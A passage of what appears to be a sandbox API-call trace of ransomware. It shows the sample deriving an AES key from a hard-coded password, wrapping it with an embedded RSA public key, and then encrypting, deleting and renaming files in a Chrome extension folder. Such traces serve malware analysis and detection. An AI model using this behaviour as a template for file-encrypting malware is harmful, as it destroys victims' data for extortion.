| out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.073] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.073] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.074] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.074] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.074] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.074] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.074] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.074] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.074] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.074] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.074] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.074] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.074] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.074] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.074] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.074] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.075] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.075] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.075] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.075] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.075] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.075] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.075] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.075] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.075] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.075] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.076] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.076] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.076] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x1b3, lpOverlapped=0x0) returned 1 [0262.076] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x1b3, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x1c0) returned 1 [0262.076] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1c0, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x1c0, lpOverlapped=0x0) returned 1 [0262.076] CloseHandle (hObject=0x5d50) returned 1 [0262.076] CloseHandle (hObject=0x5d64) returned 1 [0262.076] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js"), bFailIfExists=0) returned 1 [0262.079] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js", dwFileAttributes=0x0) returned 1 [0262.080] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.gsg")) returned 1 [0262.081] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.fuck")) returned 1 [0262.083] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0262.083] CryptDestroyKey (hKey=0x2e7fc00) returned 1 [0262.083] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0262.083] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0262.083] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0262.083] GetLastError () returned 0x0 [0262.083] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js")) returned 0x20 [0262.083] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js", dwFileAttributes=0x80) returned 1 [0262.084] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0262.085] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0262.085] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.gsg", dwFileAttributes=0x2) returned 1 [0262.086] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e7a500) returned 1 [0262.088] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0262.088] lstrlenA (lpString="sMlycgvlQVZfOQrrHUueZgtAzMlQm") returned 29 [0262.088] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0262.088] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e7fd40) returned 1 [0262.088] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0262.088] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0262.088] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e73020) returned 1 [0262.089] CryptImportPublicKeyInfo (in: hCryptProv=0x2e73020, dwCertEncodingType=0x1, pInfo=0x2ead280*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2ead2b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2ead2b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e7e040) returned 1 [0262.089] CryptEncrypt (in: hKey=0x2e7e040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0262.089] CryptEncrypt (in: hKey=0x2e7e040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e72c68*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e72c68*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0262.089] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e72c68*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e72c68*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0262.090] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.092] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.092] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.115] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.116] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.116] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.116] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.116] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.116] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.117] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.117] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.117] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.117] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.117] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.117] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.117] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.117] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.117] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.117] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.117] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.117] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.118] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.118] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.118] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.118] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.118] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.118] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.118] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.118] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.118] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.118] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.118] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.118] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.118] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.119] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.119] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.119] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.119] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.119] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.119] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 